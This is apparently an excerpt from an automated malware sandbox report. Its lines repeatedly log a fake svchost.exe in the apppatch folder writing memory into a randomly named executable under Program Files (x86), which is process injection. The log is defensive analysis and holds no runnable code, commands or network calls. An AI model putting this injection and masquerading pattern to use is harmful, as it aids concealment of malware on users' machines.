Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2D91000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2D92000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2DE5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2A80000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2A81000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2A82000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2AD5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29F0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29F1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29F2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2A45000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2170000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2171000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2172000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 21C5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: D90000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: D91000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: D92000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: DE5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 20F0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 20F1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 20F2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2145000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29A0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29A1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29A2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29F5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 20D0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 20D1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 20D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2125000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3040000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3041000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3042000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3095000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2D80000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2D81000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2D82000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2DD5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: C90000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: C91000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: C92000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: CE5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2560000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2561000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2562000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 25B5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1FA0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1FA1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1FA2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1FF5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2620000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2621000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2622000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2675000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 11E0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 11E1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 11E2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1235000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3130000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3131000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3132000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3185000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2EC0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2EC1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2EC2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F15000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BF0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BF1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2BF2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2C45000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2DD0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2DD1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2DD2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2E25000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29E0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29E1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29E2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2A35000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27A0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27A1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27A2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27F5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F50000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F51000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F52000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2FA5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 10B0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 10B1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 10B2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1105000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 26F0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 26F1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 26F2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2745000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29E0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29E1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29E2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2A35000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2920000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2921000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2922000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2975000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2000000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2001000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2002000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2055000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2960000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2961000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2962000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29B5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2240000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2241000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2242000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2295000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3060000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3061000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3062000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 30B5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1010000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1011000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1012000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1065000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 28C0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 28C1000Jump to behavior
